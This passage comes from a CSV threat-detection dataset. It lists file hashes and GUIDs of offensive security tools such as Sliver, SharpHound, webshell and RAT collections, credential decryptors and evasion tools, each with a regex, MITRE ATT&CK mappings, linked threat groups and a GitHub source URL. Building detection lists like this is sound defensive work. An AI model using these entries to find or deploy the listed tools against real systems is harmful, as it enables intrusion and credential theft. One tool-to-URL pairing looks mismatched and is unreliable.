#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","35341" "*bb492ce3f8bf143311fd2272e57c342451d504feb639f0bc41a33df19cf459cf*",".{0,1000}bb492ce3f8bf143311fd2272e57c342451d504feb639f0bc41a33df19cf459cf.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35343" 
"*bb5173e021c5e905809d7956cb5871edf062418d9227b553599480455d9e2524*",".{0,1000}bb5173e021c5e905809d7956cb5871edf062418d9227b553599480455d9e2524.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35344" "*bb57ff50e43b27f0f38affe2192c1969dfedff65ea38664b48d1ed7722a0fdee*",".{0,1000}bb57ff50e43b27f0f38affe2192c1969dfedff65ea38664b48d1ed7722a0fdee.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35346" "*bb62708fb9f961bffe55ec0fd74eead24e9d0b6c9e1ef054c845e7bc23af70a8*",".{0,1000}bb62708fb9f961bffe55ec0fd74eead24e9d0b6c9e1ef054c845e7bc23af70a8.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","35349" "*bb62a3336da75791e241e3e757318dd0af03c1c678a249c3b67f16ef75ce648e*",".{0,1000}bb62a3336da75791e241e3e757318dd0af03c1c678a249c3b67f16ef75ce648e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35350" "*bb63353c43f1a3ff8161674e4ffaf3835b1adbcbe6cba46b4aa7b06020f05233*",".{0,1000}bb63353c43f1a3ff8161674e4ffaf3835b1adbcbe6cba46b4aa7b06020f05233.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35351" "*bb635b88ae16476a37144d24c8b0f898d619147d069091e9869de6db130db0df*",".{0,1000}bb635b88ae16476a37144d24c8b0f898d619147d069091e9869de6db130db0df.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","35352" "*bb65c7f01b9110e615083a0c5a02d324dd0dcd9416bd9791b4fc92d284cbf206*",".{0,1000}bb65c7f01b9110e615083a0c5a02d324dd0dcd9416bd9791b4fc92d284cbf206.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35354" "*bb695f5c847a67e8d0b6918a474b0f93090c8c5d64bf5b160b9f0c0fd4352bf5*",".{0,1000}bb695f5c847a67e8d0b6918a474b0f93090c8c5d64bf5b160b9f0c0fd4352bf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35355" "*bb6ca78dc8a3774eb3db52580c52bc6b47ca885d9881f5cb422c915ca2c2a7a9*",".{0,1000}bb6ca78dc8a3774eb3db52580c52bc6b47ca885d9881f5cb422c915ca2c2a7a9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35356" "*bb6ff6e0660ed1de042e61d57e12a8cc93709dc19db5328b53d5f258839cd7c0*",".{0,1000}bb6ff6e0660ed1de042e61d57e12a8cc93709dc19db5328b53d5f258839cd7c0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35357" "*bb774a70665afeafeda776cc7b37f59f29fc3b16124e94020a91d4fdfa3f260b*",".{0,1000}bb774a70665afeafeda776cc7b37f59f29fc3b16124e94020a91d4fdfa3f260b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35359" "*bb7f042ac2b1d062178a3168cda13c75564282b4d9c5aa231ff2dd42fb343fd1*",".{0,1000}bb7f042ac2b1d062178a3168cda13c75564282b4d9c5aa231ff2dd42fb343fd1.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege 
Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","35361" "*bb816067581c9cd64ea54ff05611c02efa4303ef95c86e027ca26aa2ae80c185*",".{0,1000}bb816067581c9cd64ea54ff05611c02efa4303ef95c86e027ca26aa2ae80c185.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","35363" "*bb8861d4a96d5b61c018115dcfe61176d12097e271ac1d34860bf50fe89618c8*",".{0,1000}bb8861d4a96d5b61c018115dcfe61176d12097e271ac1d34860bf50fe89618c8.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","35365" "*bb89de818ececdcc29e0dae02fc30b07b8646c45a2fd46fa0bb55659b946aa93*",".{0,1000}bb89de818ececdcc29e0dae02fc30b07b8646c45a2fd46fa0bb55659b946aa93.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","35366" 
"*BB8A69C4-18B0-4FF2-989C-F70778FFBCE6*",".{0,1000}BB8A69C4\-18B0\-4FF2\-989C\-F70778FFBCE6.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#GUIDproject","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","35367" "*bb8a907ebbe611f271b35d461b15ccb8e90e36567e9963ea9a64ba4fe3d7d1bc*",".{0,1000}bb8a907ebbe611f271b35d461b15ccb8e90e36567e9963ea9a64ba4fe3d7d1bc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","35368" "*bb8ca66193a7f85a5e87467806865b8dc7656db2eb5e3fd86576d4559bf9c737*",".{0,1000}bb8ca66193a7f85a5e87467806865b8dc7656db2eb5e3fd86576d4559bf9c737.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35370" "*bb8e4578feb7e957ef5b77433c1ee7cb339499d1bd05460848bc841871e0b672*",".{0,1000}bb8e4578feb7e957ef5b77433c1ee7cb339499d1bd05460848bc841871e0b672.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","35371" "*bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31*",".{0,1000}bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","35373" "*bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31*",".{0,1000}bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#filehash","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","35374" "*bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31*",".{0,1000}bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) 
or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#filehash","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","35375" "*bb94573eaa965f3371451dcfbde19645354cfd7a8d18f2022d2497d182e72754*",".{0,1000}bb94573eaa965f3371451dcfbde19645354cfd7a8d18f2022d2497d182e72754.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#filehash","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","35376" "*bb949fe0fcc794116d8972a418314c97d0e39c536a56d1858866ff8eb6a46f02*",".{0,1000}bb949fe0fcc794116d8972a418314c97d0e39c536a56d1858866ff8eb6a46f02.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35377" "*bb94dc4cb2b8a99594a2199912c675406ae64d5e30141c4f3aa9109053a2790d*",".{0,1000}bb94dc4cb2b8a99594a2199912c675406ae64d5e30141c4f3aa9109053a2790d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35378" "*bb95177747c3f54ff72dbcd2942c2278ee7567a1202c6d5c3183faeb78cf673c*",".{0,1000}bb95177747c3f54ff72dbcd2942c2278ee7567a1202c6d5c3183faeb78cf673c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35379" "*bb9699111559e3ac8e2739160742798aa113f5ad994e6bff78b1dc6d999c4116*",".{0,1000}bb9699111559e3ac8e2739160742798aa113f5ad994e6bff78b1dc6d999c4116.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35380" "*bb9baa4f564a8d9630350d7b057686668f2096d5b59062d247a64266d379f185*",".{0,1000}bb9baa4f564a8d9630350d7b057686668f2096d5b59062d247a64266d379f185.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35381" 
"*bba2c964972ac62ae9f9a2e0ee0046fa046dff0cd53183ca2169e1659c234e98*",".{0,1000}bba2c964972ac62ae9f9a2e0ee0046fa046dff0cd53183ca2169e1659c234e98.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","35382" "*bba575ec-0c7f-42e1-9b59-b7c9cca522ba*",".{0,1000}bba575ec\-0c7f\-42e1\-9b59\-b7c9cca522ba.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","#GUIDproject","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","35384" "*bba6a9e8cad0cb6d31618c1cc565475cc23487f624a202002bba3170905ce614*",".{0,1000}bba6a9e8cad0cb6d31618c1cc565475cc23487f624a202002bba3170905ce614.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","35386" "*bbae26473d5ca41404788c5b58ab495e9b7fdd988986657be0e0505400047207*",".{0,1000}bbae26473d5ca41404788c5b58ab495e9b7fdd988986657be0e0505400047207.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35388" "*bbafc8c3db7a42d1419f9c741f6508da43325f3993202d8955b2f9e0d2f971a9*",".{0,1000}bbafc8c3db7a42d1419f9c741f6508da43325f3993202d8955b2f9e0d2f971a9.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","35389" "*bbb23c2b1443945e653b67353906939549ffac7dcdcf4bfd6a6c2f67a6320d13*",".{0,1000}bbb23c2b1443945e653b67353906939549ffac7dcdcf4bfd6a6c2f67a6320d13.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35391" "*bbbf3709995e0cb8924bc07e857042afdf5a294620c32e12136805ed6bb8735b*",".{0,1000}bbbf3709995e0cb8924bc07e857042afdf5a294620c32e12136805ed6bb8735b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35393" 
"*BBCD0202-C086-437C-A606-015456F90C46*",".{0,1000}BBCD0202\-C086\-437C\-A606\-015456F90C46.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","#GUIDproject","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","35395" "*bbd92565c5ec78f1d2935a02745d85bc09e5b4624413cbc8fbb704c611b98050*",".{0,1000}bbd92565c5ec78f1d2935a02745d85bc09e5b4624413cbc8fbb704c611b98050.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35396" "*bbdd3620a67aedec4b9a68b2c9cc880b6631215e129816aea19902a6f4bc6f41*",".{0,1000}bbdd3620a67aedec4b9a68b2c9cc880b6631215e129816aea19902a6f4bc6f41.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","35397" "*bbdfa6cc54416cfa7ee7af469569e527d2f8d009c2e8aab2393c531749dc7e2d*",".{0,1000}bbdfa6cc54416cfa7ee7af469569e527d2f8d009c2e8aab2393c531749dc7e2d.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","35398" 
"*bbe1978fae7026d7eb9aafab269fec0780e41ecccf40ad03dc37cc12653c2c14*",".{0,1000}bbe1978fae7026d7eb9aafab269fec0780e41ecccf40ad03dc37cc12653c2c14.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35399" "*bbe45481716b6bb2d560efd66772ed9e43c148498c7c5003d4889fafed723cca*",".{0,1000}bbe45481716b6bb2d560efd66772ed9e43c148498c7c5003d4889fafed723cca.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","35401" "*bbe4f27231eb9b0b5f7f223d84fa323de69b1575f4b391d7de0614325a97c24d*",".{0,1000}bbe4f27231eb9b0b5f7f223d84fa323de69b1575f4b391d7de0614325a97c24d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35402" "*bbee76061abd7a8272670354eaa071c698657c4f96f9d6002d36ee8cd234f791*",".{0,1000}bbee76061abd7a8272670354eaa071c698657c4f96f9d6002d36ee8cd234f791.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - 
UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","35404" "*bbepis/Nsocks*",".{0,1000}bbepis\/Nsocks.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","1","N/A","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","35405" "*bbf29036cd4d73fa71e311d60c436a4c03b72d2ea9b9c450ca9a88bb6ce98a03*",".{0,1000}bbf29036cd4d73fa71e311d60c436a4c03b72d2ea9b9c450ca9a88bb6ce98a03.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35406" "*bbf4a68d05e79d8d2ce0bbd948a713ddafcb74b4ababa5f43c154592bc09e897*",".{0,1000}bbf4a68d05e79d8d2ce0bbd948a713ddafcb74b4ababa5f43c154592bc09e897.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","35407" "*BBFBAF1D-A01E-4615-A208-786147320C20*",".{0,1000}BBFBAF1D\-A01E\-4615\-A208\-786147320C20.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege 
